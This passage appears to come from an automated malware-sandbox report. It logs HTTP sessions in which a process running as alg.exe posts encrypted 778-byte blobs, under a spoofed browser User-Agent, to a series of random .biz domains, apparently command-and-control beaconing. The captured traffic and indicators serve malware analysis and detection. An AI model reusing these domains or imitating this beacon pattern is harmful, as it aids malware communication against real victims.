                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:25.064815998 CEST778OUTData Raw: 98 a8 13 ee 3d 1d c1 fc fe 02 00 00 b9 80 d0 7a 38 36 fc df d5 2a 03 70 0e 32 f5 31 7e 67 b6 bd 5e 28 4b b7 9d 43 28 29 68 46 6c 1a 5e 73 c0 92 bb aa 05 fa 9e fc 5b 67 5e 36 f3 b3 d4 71 0f 30 d6 24 6b 0c f2 19 2e c8 c8 c4 e2 f3 57 e6 f1 cf 3b 12
                                                                                                                                                                                                                                                                                                          Data Ascii: =z86*p21~g^(KC()hFl^s[g^6q0$k.W;IM,W[o;AA4cpp.fo,8jS:rfgl#8 i_}jRNa7}(5? /y"W2MYRP-H
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:25.815083027 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:25 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=69e26f38f769d375cb01ca2f7d9c23e9|8.46.123.33|1728547705|1728547705|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          40192.168.2.550021208.100.26.245807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.165040970 CEST354OUTPOST /icltfkrjatd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.165055037 CEST778OUTData Raw: 20 1f 71 bd 83 de b8 99 fe 02 00 00 07 24 d0 99 b9 e4 f0 98 2b cc 8c 10 af cc d6 63 41 a0 86 44 0f 39 8d 2d 41 d9 09 d3 c1 46 d9 15 bc ce ae 3f 5d 76 6c c4 f8 dd 77 bb e2 f7 b3 22 d5 9b 06 54 67 93 01 b8 e6 bc fd a3 07 f7 8c 0f 11 87 29 c5 b5 be
                                                                                                                                                                                                                                                                                                          Data Ascii: q$+cAD9-AF?]vlw"Tg)ak$K!'hCw}<'u,_XOjo! cg={Z+C|\@D,=hN%sX.XU1v6UU=!q?U{F57-i#WY8Y.IC
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.653096914 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:26 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.736372948 CEST359OUTPOST /xnxlkgkrmwlxblkt HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.736397028 CEST778OUTData Raw: 7f 02 64 31 e3 b0 0c 5d fe 02 00 00 cb 45 b5 16 eb 70 61 bb 37 92 22 12 06 e7 ed d7 3d 63 58 6e 00 47 ab 76 3e d3 45 71 b3 cc ff 7a 5f 02 28 17 b6 ec 89 1a 0f 93 06 a5 a8 04 85 f1 fd 1c b7 3f db 08 03 60 9b e2 c8 b7 c0 56 ac 65 7a a4 ff f6 2e 39
                                                                                                                                                                                                                                                                                                          Data Ascii: d1]Epa7"=cXnGv>Eqz_(?`Vez.9s\"$GJ~GK)Eap_#YQ))*5NN[IgvqA{*YZ-%>fFd=#$uI&H_%z /qt.W`
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:26.855143070 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:26 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          41192.168.2.55002234.211.97.45807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:27.377311945 CEST352OUTPOST /hisgijrksnb HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jpskm.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:27.377329111 CEST778OUTData Raw: 40 d5 8c 37 32 f9 6f e1 fe 02 00 00 81 f1 18 7d 53 ed d7 61 01 49 52 bb 6d 90 f5 35 eb 54 3f eb bb 5a c8 e4 2f 13 10 c7 79 0d 3c e2 a3 23 4e e3 82 e1 54 1b fc 68 4f 09 76 5b 29 3c 8a 15 1b 16 4b 9e 06 f8 16 4e 31 3b 3a 8a 61 39 bf 96 fa 61 dc e7
                                                                                                                                                                                                                                                                                                          Data Ascii: @72o}SaIRm5T?Z/y<#NThOv[)<KN1;:a9a"G)25 rkKGA1Ni:YO,l^?R]t`-}@]s#+mc;nb%uAv=c[kc@1Fa|\9JwJ
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:28.098156929 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:27 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=728628397f2ff4bf64ac07363f01c85e|8.46.123.33|1728547707|1728547707|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          42192.168.2.55002354.244.188.177807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:28.301605940 CEST346OUTPOST /sc HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:28.301620960 CEST778OUTData Raw: 4b 4e 0f 9e ed b9 17 e8 fe 02 00 00 3f f4 69 13 0e b7 b2 f5 c7 e7 51 c6 fc 4c 37 83 bf 46 7b 95 49 36 26 7b 89 9f 41 21 0b b4 29 df 06 f5 e4 a7 a9 01 d3 81 d5 ab a4 64 b4 25 9a 5b 1c 27 e9 d0 81 2e 25 81 fb 9a 43 4d 37 d7 b8 44 bf 49 f1 d8 89 55
                                                                                                                                                                                                                                                                                                          Data Ascii: KN?iQL7F{I6&{A!)d%['.%CM7DIU9ppd[d0y3IBkEV2{'^(&\{;H% f-L(uC$p[QX9wQ6"J=GP+x4dW=BOuD9$l{!7Q-Jhi>
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:29.020993948 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:28 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=494b7485581ade92f0211ef1ac0924d2|8.46.123.33|1728547708|1728547708|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          43192.168.2.55002418.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:29.295953035 CEST344OUTPOST /a HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: wllvnzb.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:29.295969963 CEST778OUTData Raw: 24 e5 d5 da 02 d2 b4 8b fe 02 00 00 c1 68 e1 26 27 42 d5 72 8c 31 03 a5 49 4e c7 85 b0 42 11 80 1a cf 00 71 ea f9 09 73 f4 3a 67 ce f4 3d 79 77 c2 ef b9 fd 66 2b 4b 1f 5d 67 1c 31 52 eb 2d 26 73 b9 75 47 09 71 5f e8 43 a0 1f 86 b9 75 f1 4f 35 10
                                                                                                                                                                                                                                                                                                          Data Ascii: $h&'Br1INBqs:g=ywf+K]g1R-&suGq_CuO5O`Ajr[JFN(x==?%~czPypw0>$XRIe#tk{`y?d:z<{2R[<;t 3:n5 wk<q,!P 0*N|U4G=
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:30.655853987 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:30 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=8936c7c85dae5058915b9e9ad37fe53c|8.46.123.33|1728547710|1728547710|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          44192.168.2.55002518.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:30.873085022 CEST345OUTPOST /skpx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:30.873107910 CEST778OUTData Raw: 90 26 11 7e 21 29 2d fe fe 02 00 00 55 15 d8 02 95 43 45 87 36 3b b4 cd 38 e7 b2 e7 50 42 3f 55 d0 a6 3b c0 84 b8 62 38 df 69 c7 68 1d bb 4f b0 c3 a7 ff a9 d5 28 50 8b 46 75 8c 05 07 a0 c1 ac 19 53 66 c6 49 70 52 c0 e0 23 d5 f4 44 63 09 cb 8a 1b
                                                                                                                                                                                                                                                                                                          Data Ascii: &~!)-UCE6;8PB?U;b8ihO(PFuSfIpR#Dc6?x1f]mL|InO.Y1vCA$W]!u[=`3jod4\XL^fRyOqbe>rhF9Kmr"|{9xE4$@.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.339724064 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:31 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=bf66fa243a2db553f6d3368b2d5fed1d|8.46.123.33|1728547711|1728547711|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          45192.168.2.55002644.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.610157013 CEST350OUTPOST /wgcbdp HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:31.610182047 CEST778OUTData Raw: 39 40 5c 65 62 8f 49 4d fe 02 00 00 f6 46 1e 38 8b cd 33 2d ef 80 24 00 24 5f cf 4a 72 90 02 cf 61 7c 09 8b 02 7b 85 98 c1 84 7d 35 48 5d 73 dd 1e a6 44 e4 d5 3f 0e 5c b2 bb a4 ce 42 d4 d3 a4 56 98 f2 2d 8b 21 a7 e1 c8 b6 92 2e be 16 88 6d 61 00
                                                                                                                                                                                                                                                                                                          Data Ascii: 9@\ebIMF83-$$_Jra|{}5H]sD?\BV-!.maD->MZ[3-.>DD^NSiJ/5ADc0?*.(j2^C8L?I)5"GXZ\T!v6D)O~!u:AKq;0f#[88$
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.066260099 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:32 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=a7ed02a123af8e1794b7e6de60b38dc0|8.46.123.33|1728547712|1728547712|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          46192.168.2.55002718.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.361505032 CEST360OUTPOST /sxrtljpowkklyfep HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:32.361529112 CEST778OUTData Raw: 46 ea e4 37 ac 76 4b 22 fe 02 00 00 0d 19 12 f3 a8 0d 3e 60 15 ad 91 66 fb 39 dc db 08 bd 32 b7 5d d5 0d b5 d4 2b f5 91 84 2e ae f5 05 b2 f0 c7 6c 04 05 20 e1 3a 6d 6d a0 e1 8c 9d dc b0 02 e9 f6 44 c3 21 93 c4 6d e3 2c dc 90 98 fc d1 03 55 45 77
                                                                                                                                                                                                                                                                                                          Data Ascii: F7vK">`f92]+.l :mmD!m,UEw9p,N6%57>h.z+oO=_[-wR$t_q|m/.wBnIo;" w.m,xwfNr6[/z.$8[6
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:33.693167925 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:33 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=d63b41ee69441ed61a20dcbe2f1bdb68|8.46.123.33|1728547713|1728547713|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          47192.168.2.55002844.213.104.86807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.030590057 CEST347OUTPOST /ksvtsx HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vyome.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.030608892 CEST778OUTData Raw: e6 d9 a0 9a 2c a5 9e b8 fe 02 00 00 62 a9 4b c3 0f 7a d1 37 b3 0f df 38 9d dd af 58 6d 5f 1c 6e d2 51 34 01 12 61 e0 ae e9 48 ca 2c 99 da 7e ea f1 88 0b df 15 6a db 94 76 9b 94 c9 c6 8b 33 9c b6 3a ed 6b c2 1c 5e 28 25 da 7d 4e e2 e0 15 32 e9 1b
                                                                                                                                                                                                                                                                                                          Data Ascii: ,bKz78Xm_nQ4aH,~jv3:k^(%}N25Q8vANY:=x7etWCT5M"42?Nbypx/d]vt4"e<%2i.#~SlK:3[Q'/fJH{d6C@5OzH{9
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:34.491559982 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:34 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=6e0bd02a8073bfe26b8b3f0d774aec7a|8.46.123.33|1728547714|1728547714|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
